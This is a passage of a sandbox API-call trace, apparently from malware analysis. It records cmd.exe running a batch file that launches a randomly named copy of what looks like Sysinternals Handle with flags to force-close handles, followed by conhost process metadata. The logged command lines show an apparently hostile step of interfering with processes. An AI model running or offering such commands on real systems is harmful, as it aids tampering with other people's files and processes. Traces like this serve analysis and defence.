returned 0x7 [0221.176] GetFileType (hFile=0x7) returned 0x2 [0221.176] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0221.177] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f6a0 | out: lpMode=0x34f6a0) returned 1 [0221.177] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.177] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x34f6cc, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f6cc*=0x26) returned 1 [0221.179] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x34f6fc | out: _Buffer=") ") returned 2 [0221.179] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.179] GetFileType (hFile=0x7) returned 0x2 [0221.180] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0221.180] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f6bc | out: lpMode=0x34f6bc) returned 1 [0221.180] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.180] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x34f6e8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f6e8*=0x2) returned 1 [0221.181] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x34f71c | out: _Buffer="\r\n") returned 2 [0221.181] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.181] GetFileType (hFile=0x7) returned 0x2 [0221.181] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0221.181] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f6dc | out: lpMode=0x34f6dc) returned 1 [0221.182] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.182] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x34f708, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f708*=0x2) returned 1 [0221.184] GetProcessHeap () returned 0x350000 [0221.184] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x2c) returned 0x3643f0 [0221.184] GetProcessHeap () returned 0x350000 [0221.184] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xc) returned 0x350db8 [0221.184] GetProcessHeap () returned 0x350000 [0221.184] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xc) returned 0x350dd0 [0221.184] GetProcessHeap () returned 0x350000 [0221.184] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xe) returned 0x350de8 [0221.184] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0221.184] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0221.184] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0221.184] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0221.184] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0221.184] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0221.184] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0221.184] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0x34f638, _Radix=0 | out: _EndPtr=0x34f638*=",6 delims=: \"") returned 3 [0221.184] wcstol (in: _String="6 delims=: \"", _EndPtr=0x34f638, _Radix=0 | out: _EndPtr=0x34f638*=" delims=: \"") returned 6 [0221.184] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0221.184] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0221.184] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0221.184] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0221.184] GetProcessHeap () returned 0x350000 [0221.184] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x350de8 | out: hHeap=0x350000) returned 1 [0221.184] GetProcessHeap () returned 0x350000 [0221.185] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xe) returned 0x350de8 [0221.185] GetProcessHeap () returned 0x350000 [0221.185] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x350db8, Size=0xe) returned 0x350e00 [0221.185] GetProcessHeap () returned 0x350000 [0221.185] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x350e00) returned 0xe [0221.185] GetProcessHeap () returned 0x350000 [0221.185] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x350dd0, Size=0x14) returned 0x350ab8 [0221.185] GetProcessHeap () returned 0x350000 [0221.185] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x350ab8) returned 0x14 [0221.185] _wpopen (_Command="tdq963ii.exe -accepteula \"Month_Calendar.jtp\" -nobanner", _Mode="rb") returned 0x77032960 [0222.070] feof (_File=0x77032960) returned 0 [0222.070] ferror (_File=0x77032960) returned 0 [0222.070] GetProcessHeap () returned 0x350000 [0222.070] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x108) returned 0x364428 [0222.070] fgets (in: _Buf=0x364430, _MaxCount=256, _File=0x77032960 | out: _Buf="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n", _File=0x77032960) returned="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n" [0228.519] feof (_File=0x77032960) returned 0 [0228.519] ferror (_File=0x77032960) returned 0 [0228.519] GetProcessHeap () returned 0x350000 [0228.519] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x364428, Size=0x208) returned 0x364428 [0228.519] GetProcessHeap () returned 0x350000 [0228.519] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364428) returned 0x208 [0228.519] fgets (in: _Buf=0x364476, _MaxCount=442, _File=0x77032960 | out: _Buf="\r\r\n", _File=0x77032960) returned="\r\r\n" [0228.519] feof (_File=0x77032960) returned 0 [0228.519] ferror (_File=0x77032960) returned 0 [0228.519] GetProcessHeap () returned 0x350000 [0228.519] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x364428, Size=0x308) returned 0x364428 [0228.519] GetProcessHeap () returned 0x350000 [0228.519] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364428) returned 0x308 [0228.520] fgets (in: _Buf=0x364479, _MaxCount=695, _File=0x77032960 | out: _Buf="", _File=0x77032960) returned 0x0 [0229.559] _pclose (in: _File=0x77032960 | out: _File=0x77032960) returned 1 [0229.560] GetProcessHeap () returned 0x350000 [0229.560] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x364428, Size=0x9e) returned 0x364428 [0229.560] GetProcessHeap () returned 0x350000 [0229.560] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364428) returned 0x9e [0229.560] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x364479, cbMultiByte=73, lpWideCharStr=0x364430, cchWideChar=73 | out: lpWideCharStr="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n\r\r\n") returned 73 [0229.561] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x34f32c | out: _Buffer="\r\n") returned 2 [0229.561] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.561] GetFileType (hFile=0x7) returned 0x2 [0229.562] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.562] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f2ec | out: lpMode=0x34f2ec) returned 1 [0229.562] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.562] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x34f318, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f318*=0x2) returned 1 [0229.564] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0229.564] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x34f328 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0229.564] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x34f328 | out: _Buffer=">") returned 1 [0229.564] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.564] GetFileType (hFile=0x7) returned 0x2 [0229.565] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.565] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f2f0 | out: lpMode=0x34f2f0) returned 1 [0229.565] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.565] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x34f31c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x34f31c*=0x26) returned 1 [0229.565] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.566] GetFileType (hFile=0x7) returned 0x2 [0229.566] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.566] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f574 | out: lpMode=0x34f574) returned 1 [0229.566] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.566] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x34f5a0, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x34f5a0*=0x1) returned 1 [0229.566] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.567] GetFileType (hFile=0x7) returned 0x2 [0229.567] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.567] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f558 | out: lpMode=0x34f558) returned 1 [0229.567] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.567] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x374bd8*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x34f584, lpReserved=0x0 | out: lpBuffer=0x374bd8*, lpNumberOfCharsWritten=0x34f584*=0xc) returned 1 [0229.568] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x34f590 | out: _Buffer=" -accepteula -c Run -y -p extract -nobanner ") returned 44 [0229.568] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.568] GetFileType (hFile=0x7) returned 0x2 [0229.568] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.568] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f550 | out: lpMode=0x34f550) returned 1 [0229.568] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.568] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x34f57c, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f57c*=0x2c) returned 1 [0229.570] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x34f5ac | out: _Buffer=") ") returned 2 [0229.570] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.570] GetFileType (hFile=0x7) returned 0x2 [0229.570] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.571] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f56c | out: lpMode=0x34f56c) returned 1 [0229.571] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.571] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x34f598, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f598*=0x2) returned 1 [0229.571] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x34f5cc | out: _Buffer="\r\n") returned 2 [0229.571] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.571] GetFileType (hFile=0x7) returned 0x2 [0229.572] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.572] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f58c | out: lpMode=0x34f58c) returned 1 [0229.572] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.572] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x34f5b8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f5b8*=0x2) returned 1 [0229.574] GetConsoleTitleW (in: lpConsoleTitle=0x34f0dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0229.575] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x364778, lpFilePart=0x34ebfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x34ebfc*="Desktop") returned 0x25 [0229.575] SetErrorMode (uMode=0x0) returned 0x1 [0229.575] GetProcessHeap () returned 0x350000 [0229.575] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x364770, Size=0x6e) returned 0x364770 [0229.575] GetProcessHeap () returned 0x350000 [0229.576] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364770) returned 0x6e [0229.576] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0229.576] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0229.576] GetProcessHeap () returned 0x350000 [0229.576] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x120) returned 0x3647e8 [0229.576] GetProcessHeap () returned 0x350000 [0229.576] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x238) returned 0x364910 [0229.576] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0229.577] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x34e998, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34e998) returned 0x364ac0 [0229.577] FindClose (in: hFindFile=0x364ac0 | out: hFindFile=0x364ac0) returned 1 [0229.577] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0229.577] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0229.577] GetConsoleTitleW (in: lpConsoleTitle=0x34ee70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0229.578] InitializeProcThreadAttributeList (in: lpAttributeList=0x34ecf8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x34edc0 | out: lpAttributeList=0x34ecf8, lpSize=0x34edc0) returned 1 [0229.578] UpdateProcThreadAttribute (in: lpAttributeList=0x34ecf8, dwFlags=0x0, Attribute=0x60001, lpValue=0x34edb8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x34ecf8, lpPreviousValue=0x0) returned 1 [0229.578] GetStartupInfoW (in: lpStartupInfo=0x34ecb4 | out: lpStartupInfo=0x34ecb4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0229.578] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0229.578] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x34ed54*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x34eda0 | out: lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessInformation=0x34eda0*(hProcess=0x74, hThread=0x84, dwProcessId=0x120, dwThreadId=0xb08)) returned 1 [0229.602] CloseHandle (hObject=0x84) returned 1 [0229.602] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0229.602] GetProcessHeap () returned 0x350000 [0229.602] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3676f0 | out: hHeap=0x350000) returned 1 [0229.602] GetEnvironmentStringsW () returned 0x366b58* [0229.602] GetProcessHeap () returned 0x350000 [0229.602] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xb8c) returned 0x3676f0 [0229.603] FreeEnvironmentStringsW (penv=0x366b58) returned 1 [0229.603] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0237.393] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x34ec94 | out: lpExitCode=0x34ec94*=0x0) returned 1 [0237.393] CloseHandle (hObject=0x74) returned 1 [0237.393] _vsnwprintf (in: _Buffer=0x34eddc, _BufferCount=0x13, _Format="%08X", _ArgList=0x34eca0 | out: _Buffer="00000000") returned 8 [0237.393] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0237.394] GetProcessHeap () returned 0x350000 [0237.394] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3676f0 | out: hHeap=0x350000) returned 1 [0237.394] GetEnvironmentStringsW () returned 0x366b58* [0237.394] GetProcessHeap () returned 0x350000 [0237.394] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xb8c) returned 0x3676f0 [0237.394] FreeEnvironmentStringsW (penv=0x366b58) returned 1 [0237.394] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0237.394] GetProcessHeap () returned 0x350000 [0237.394] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3676f0 | out: hHeap=0x350000) returned 1 [0237.394] GetEnvironmentStringsW () returned 0x366b58* [0237.394] GetProcessHeap () returned 0x350000 [0237.394] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xb8c) returned 0x3676f0 [0237.394] FreeEnvironmentStringsW (penv=0x366b58) returned 1 [0237.394] GetProcessHeap () returned 0x350000 [0237.394] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x350dd0 | out: hHeap=0x350000) returned 1 [0237.395] DeleteProcThreadAttributeList (in: lpAttributeList=0x34ecf8 | out: lpAttributeList=0x34ecf8) [0237.396] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.396] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0237.396] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.396] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0237.397] _get_osfhandle (_FileHandle=0) returned 0x3 [0237.397] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0237.397] SetConsoleInputExeNameW () returned 0x1 [0237.397] GetConsoleOutputCP () returned 0x1b5 [0237.398] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0237.398] SetThreadUILanguage (LangId=0x0) returned 0x409 [0237.398] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x34f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0237.399] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0237.399] _get_osfhandle (_FileHandle=3) returned 0x74 [0237.399] SetFilePointer (in: hFile=0x74, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0237.400] GetProcessHeap () returned 0x350000 [0237.400] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364a40 | out: hHeap=0x350000) returned 1 [0237.400] GetProcessHeap () returned 0x350000 [0237.400] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364910 | out: hHeap=0x350000) returned 1 [0237.400] GetProcessHeap () returned 0x350000 [0237.400] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3647e8 | out: hHeap=0x350000) returned 1 [0237.400] GetProcessHeap () returned 0x350000 [0237.400] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364770 | out: hHeap=0x350000) returned 1 [0237.400] GetProcessHeap () returned 0x350000 [0237.400] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3646e8 | out: hHeap=0x350000) returned 1 [0237.400] GetProcessHeap () returned 0x350000 [0237.400] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3644d0 | out: hHeap=0x350000) returned 1 [0237.400] GetProcessHeap () returned 0x350000 [0237.400] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x374c18 | out: hHeap=0x350000) returned 1 [0237.400] GetProcessHeap () returned 0x350000 [0237.400] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x374bd0 | out: hHeap=0x350000) returned 1 [0237.401] GetProcessHeap () returned 0x350000 [0237.401] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x350de8 | out: hHeap=0x350000) returned 1 [0237.401] GetProcessHeap () returned 0x350000 [0237.401] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x350ab8 | out: hHeap=0x350000) returned 1 [0237.401] GetProcessHeap () returned 0x350000 [0237.401] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x350e00 | out: hHeap=0x350000) returned 1 [0237.401] GetProcessHeap () returned 0x350000 [0237.401] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3643f0 | out: hHeap=0x350000) returned 1 [0237.401] GetProcessHeap () returned 0x350000 [0237.401] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364390 | out: hHeap=0x350000) returned 1 [0237.401] GetProcessHeap () returned 0x350000 [0237.401] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x35f4f0 | out: hHeap=0x350000) returned 1 [0237.401] GetProcessHeap () returned 0x350000 [0237.401] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364330 | out: hHeap=0x350000) returned 1 [0237.402] GetProcessHeap () returned 0x350000 [0237.402] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3642d0 | out: hHeap=0x350000) returned 1 [0237.402] GetProcessHeap () returned 0x350000 [0237.402] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364248 | out: hHeap=0x350000) returned 1 [0237.402] GetProcessHeap () returned 0x350000 [0237.402] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3641f0 | out: hHeap=0x350000) returned 1 [0237.402] GetProcessHeap () returned 0x350000 [0237.402] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3512a8 | out: hHeap=0x350000) returned 1 [0237.402] GetProcessHeap () returned 0x350000 [0237.402] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3641a0 | out: hHeap=0x350000) returned 1 [0237.402] GetProcessHeap () returned 0x350000 [0237.402] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x351248 | out: hHeap=0x350000) returned 1 [0237.403] _get_osfhandle (_FileHandle=3) returned 0x74 [0237.403] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0237.403] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x34f6a8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x34f6a8*=0x0, lpOverlapped=0x0) returned 1 [0237.403] GetLastError () returned 0x0 [0237.403] _get_osfhandle (_FileHandle=3) returned 0x74 [0237.403] GetFileType (hFile=0x74) returned 0x1 [0237.403] _get_osfhandle (_FileHandle=3) returned 0x74 [0237.403] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0237.403] GetProcessHeap () returned 0x350000 [0237.403] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x400a) returned 0x374bd0 [0237.403] GetProcessHeap () returned 0x350000 [0237.404] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x374bd0 | out: hHeap=0x350000) returned 1 [0237.404] _get_osfhandle (_FileHandle=3) returned 0x74 [0237.404] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0237.404] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x34f68c, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x34f68c*=0x0, lpOverlapped=0x0) returned 1 [0237.405] GetLastError () returned 0x0 [0237.405] _get_osfhandle (_FileHandle=3) returned 0x74 [0237.405] GetFileType (hFile=0x74) returned 0x1 [0237.405] _get_osfhandle (_FileHandle=3) returned 0x74 [0237.405] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0237.405] GetProcessHeap () returned 0x350000 [0237.405] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x400a) returned 0x374bd0 [0237.405] GetProcessHeap () returned 0x350000 [0237.405] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x374bd0 | out: hHeap=0x350000) returned 1 [0237.405] longjmp () [0237.405] _tell (_FileHandle=3) returned 226 [0237.405] _close (_FileHandle=3) returned 0 [0237.405] CmdBatNotification () returned 0x0 [0237.405] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.405] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0237.406] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.406] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0237.406] _get_osfhandle (_FileHandle=0) returned 0x3 [0237.407] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0237.407] SetConsoleInputExeNameW () returned 0x1 [0237.407] GetConsoleOutputCP () returned 0x1b5 [0237.407] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0237.407] SetThreadUILanguage (LangId=0x0) returned 0x409 [0237.408] exit (_Code=0) Process: id = "187" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x2e41d000" os_pid = "0x614" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT 